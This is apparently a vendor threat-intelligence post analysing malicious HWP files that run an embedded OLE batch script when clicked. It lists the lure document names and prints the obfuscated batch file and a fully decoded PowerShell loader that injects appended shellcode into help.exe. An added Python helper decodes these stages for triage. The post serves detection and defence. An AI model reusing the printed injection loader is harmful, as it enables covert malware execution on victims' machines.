The ASEC analysis team has recently discovered the active distribution of APT files that abuse a legitimate feature of HWP files: OLE object insertion. Following the case introduced in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” on March 8th, the attacker has continued distributing malicious HWP files targeting people in the fields of national defense, North Korea-related materials, and broadcasting.
When the document is opened and the user clicks the embedded object, the OLE object (a batch file) inside the HWP file is run. The batch file then launches PowerShell, which injects shellcode into a legitimate process. Because the OLE object only executes on a click, the attackers usually place text in the document prompting the user to click it.
The list below is the names of malicious HWP files distributed with such an operation method. The attacks targeted people in the field of national defense, North Korea-related materials, and broadcasting, and the distribution was done using PC messengers and web browsers.
• For review_Understanding Politics 6th Period(edited)_20220507.hwp (May 10th, 2022)
• Peace Asia membership request form(2022).hwp (May 11th, 2022)
• Innovation class questionnaire.hwp (May 18th, 2022)
• Analysis of Covid-19 in North Korea.hwp (May 20th, 2022)
• Peace Asia membership request form(Kim **).hwp (May 20th, 2022)
• Kim ** resume.hwp (May 20th, 2022)
• 2022 notices main parts excerpted.hwp (May 23rd, 2022)
• (Research Advisory Committee)_National Assembly Futures Institute_Research Projects_Survey.hwp (May 25th, 2022)
• 8th period_complete_Understanding Politics_Editor.hwp (May 26th, 2022)
• 220530- Innovation class questionnaire.hwp (May 30th, 2022)
• 2022 13th scholarship application form(for education).hwp (May 30th, 2022)
• Ministry of National Defense Academic Conference Order.hwp (June 2nd, 2022)
• 2022-0626 Seong-lan Ha – Who’s Crying.hwp (June 7th, 2022)
The following is the internal batch file script of “2022-0626 Seong-lan Ha – Who’s Crying.hwp” found on June 7th. Although the script of the batch file exists in an obfuscated form, it ultimately injects the shellcode into a legitimate Windows process using PowerShell.
@echo off
IF EXIST "%PROGRAMFILES(X86)%" (set pspath="%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe") ELSE (set pspath="%windir%\system32\WindowsPowerShell\v1.0\powershell.exe")
start "" %pspath% -command "$ttms="$eruk2="""2463029..omitted..3B7D7D""";
$blwp="""""";
for($i=0;$i -le $eruk2.Length-2;$i=$i+2){$NTMO=$eruk2[$i]+$eruk2[$i+1];$blwp= $blwp+[char]([convert]::toint16($NTMO,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($blwp));";
Invoke-Command -ScriptBlock ([Scriptblock]::Create($ttms));"
As the file’s variable names and operation method are the same as those of the sample revealed on March 3rd and discussed in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” (https://asec.ahnlab.com/en/32456/), the same group is likely behind both attacks.
- Identical variable names in the PowerShell used: $ttms, $eruk2
- Comparison of PowerShell commands (similarity in code)
-> March 3rd: $kkx9=[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);
-> June 7th: $kkp8=@" [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr a, uint b);"@;
The following is the fully decoded PowerShell code. It reads the shellcode appended at the end of the HWP file and injects it into a legitimate Windows process (help.exe).
$kkp8=@"
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr a, uint b);
"@;
$mmp8=Add-Type -MemberDefinition $kkp8 -Name "AAA" -PassThru;
$mmp8::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hP;
public IntPtr ht;
public uint dwProcessId;
public uint dwThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public uint wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
public static class Kernel32
{
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string a,string b,uint c,uint d,bool e,uint f,IntPtr g,string h, ref STARTUPINFO i,out PROCESS_INFORMATION j);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalAlloc(uint a,uint b);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr a,IntPtr b, uint c,uint d, uint e);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr a,IntPtr b,IntPtr c,uint d,IntPtr e);
[DllImport("kernel32.dll")]
public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr a,IntPtr b,uint c,IntPtr d,IntPtr e,uint f,IntPtr g);
}
"@
$si = New-Object STARTUPINFO;
$pi = New-Object PROCESS_INFORMATION;
$ap8=Get-WmiObject Win32_Process -filter "Name like 'Hwp%'";
$x=0;
$y=0;
while(1){if($y -eq 1){break;}if($ap8.GetType().Name -eq "Object[]"){if($x -eq $ap8.count){$y=1;}$bp8=$ap8[$x].Name;
$cp8=$ap8[$x++].CommandLine;}else{$bp8=$ap8.Name;
$cp8=$ap8.CommandLine;
$y=1;}$ep8=$cp8.Split('"').count;if($ep8 -eq 3){$fp8=$cp8.Split('"')[2].Split(' ')[1];}elseif($ep8 -eq 5){$fp8=$cp8.Split('"')[3];}$bytes = Get-Content $fp8 -Tail 1 -Encoding Byte;
$dp8="/c taskkill /f /im "+$bp8;cmd $dp8;if($bytes -eq 0x88){$gp8=""""+$env:TEMP+"\alw0305k.con"+"""";
$hp8=""""+$env:TEMP+"\t32.bat"+"""";
$ip8=""""+$fp8+"""";sleep 3;
$bytes = Get-Content $fp8 -Tail 0x332 -Encoding Byte;
$addr = [Kernel32]::GlobalAlloc(0x40, 0x400);
for ($h = 0;$h -lt 0x331;$h++)
{[System.Runtime.InteropServices.Marshal]::WriteByte($addr, $h, $bytes[$h]);};
[Kernel32]::CreateProcess("c:\windows\SysWOW64\help.exe",0,0,0,0,0x04,0,"c:\",[ref] $si,[ref] $pi);
$kp8=$pi.hP;
$mp8=[Kernel32]::VirtualAllocEx($kp8,0,0x400,0x1000,0x40);[Kernel32]::WriteProcessMemory($kp8,$mp8,$addr, 0x331, 0);
$dp8="/c copy /y "+$gp8+" "+$ip8;
$pep8=0;
$psp8='0';do{$pep8++;
$psp8=cmd $dp8;sleep 1;if($pep8 -eq 5){break;}}while($psp8.Trim()[0] -ne '1');start $ip8;
$jp8="cmd /c del /f "+""""+$gp8+"""";cmd $jp8;
$jp8="cmd /c del /f "+""""+$hp8+"""";cmd $jp8;
$lp8 = [Kernel32]::CreateRemoteThread($kp8, 0, 0, $mp8, 0, 0, 0);[Kernel32]::WaitForSingleObject($lp8, 500*1000);}}
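The two stages described above, the batch file's hex-to-text decoding loop and the decoded loader's check of the document's last byte before it reads the appended payload, replicated as a small Python triage helper. This is an added example, not code from the post or from the malware: the sample batch line and the fake document bytes are constructed, and the regular expression for locating the hex-encoded variable is an assumption modelled on the script shown above.

```python
"""Triage helpers for the HWP batch -> PowerShell -> injection chain (added example)."""
import re

# Assumed pattern for the first stage: a variable holding a long run of hex digits
# that the batch-embedded PowerShell converts back into text two characters at a time.
HEX_BLOB_RE = re.compile(r'\$(\w+)\s*=\s*"+([0-9A-Fa-f]{16,})"+')

# Values taken from the decoded loader on the page.
TAIL_LEN = 0x332   # bytes read from the end of the HWP file
SC_LEN = 0x331     # bytes actually copied into help.exe
MARKER = 0x88      # last byte of the file that gates the injection

INJECTION_APIS = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                  "GlobalAlloc", "CreateProcess")


def decode_hex_stages(batch_text):
    """Replicate the batch loop ($eruk2 -> $blwp): each hex pair becomes one character."""
    found = {}
    for name, blob in HEX_BLOB_RE.findall(batch_text):
        if len(blob) % 2:
            blob = blob[:-1]  # the loop stops at Length-2, so a trailing nibble is ignored
        found[name] = bytes.fromhex(blob).decode("latin-1")
    return found


def injection_indicators(ps_text):
    """Return which injection-related Win32 imports appear in decoded PowerShell."""
    return [api for api in INJECTION_APIS if api in ps_text]


def hwp_tail_check(data):
    """Apply the loader's own gate: a last byte of 0x88 means a 0x331-byte payload precedes it."""
    if len(data) < TAIL_LEN or data[-1] != MARKER:
        return None
    return data[-TAIL_LEN:][:SC_LEN]


# Constructed samples (not from the campaign): one batch line carrying hex-encoded
# PowerShell, and a fake document whose last 0x332 bytes mimic the appended stage.
SAMPLE_STAGE = "[Kernel32]::VirtualAllocEx($h,0,0x400,0x1000,0x40)"
SAMPLE_BATCH = ('start "" %pspath% -command "$ttms="$eruk2="""'
                + SAMPLE_STAGE.encode().hex() + '""";')
SAMPLE_HWP = (b"HWP Document File" + b"\x00" * 64
              + bytes(range(256)) * 3 + b"\x90" * (SC_LEN - 768) + b"\x88")

if __name__ == "__main__":
    for name, text in decode_hex_stages(SAMPLE_BATCH).items():
        print(name, "->", text, injection_indicators(text))
    payload = hwp_tail_check(SAMPLE_HWP)
    print("appended payload bytes:", None if payload is None else len(payload))
```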
In the past, malicious HWP files used in APT attacks were usually distributed by exploiting the PostScript (EPS) vulnerability. Recent distribution cases instead use a legitimate feature of the HWP file. Whereas the vulnerability runs the malicious shellcode on its own, the OLE object method requires user involvement (a click) to perform its malicious behaviors.
In February 2017, Hancom Office officially distributed a security update for the PostScript vulnerability and removed the feature for inserting and viewing EPS files. Because of this update, it appears that the attacker turned to OLE objects so that the malicious behaviors can still be executed for users running the latest version of Hancom Office.
So far, malicious HWP files have been downloaded from web browsers or distributed through PC messengers. Users should refrain from opening attachments in posts from unknown sources and take extreme caution not to download and view files sent by unknown users through a PC messenger.
[File Detection]
Infostealer/PS.Kimsuky
[IOC]
Source: https://asec.ahnlab.com/en/35405/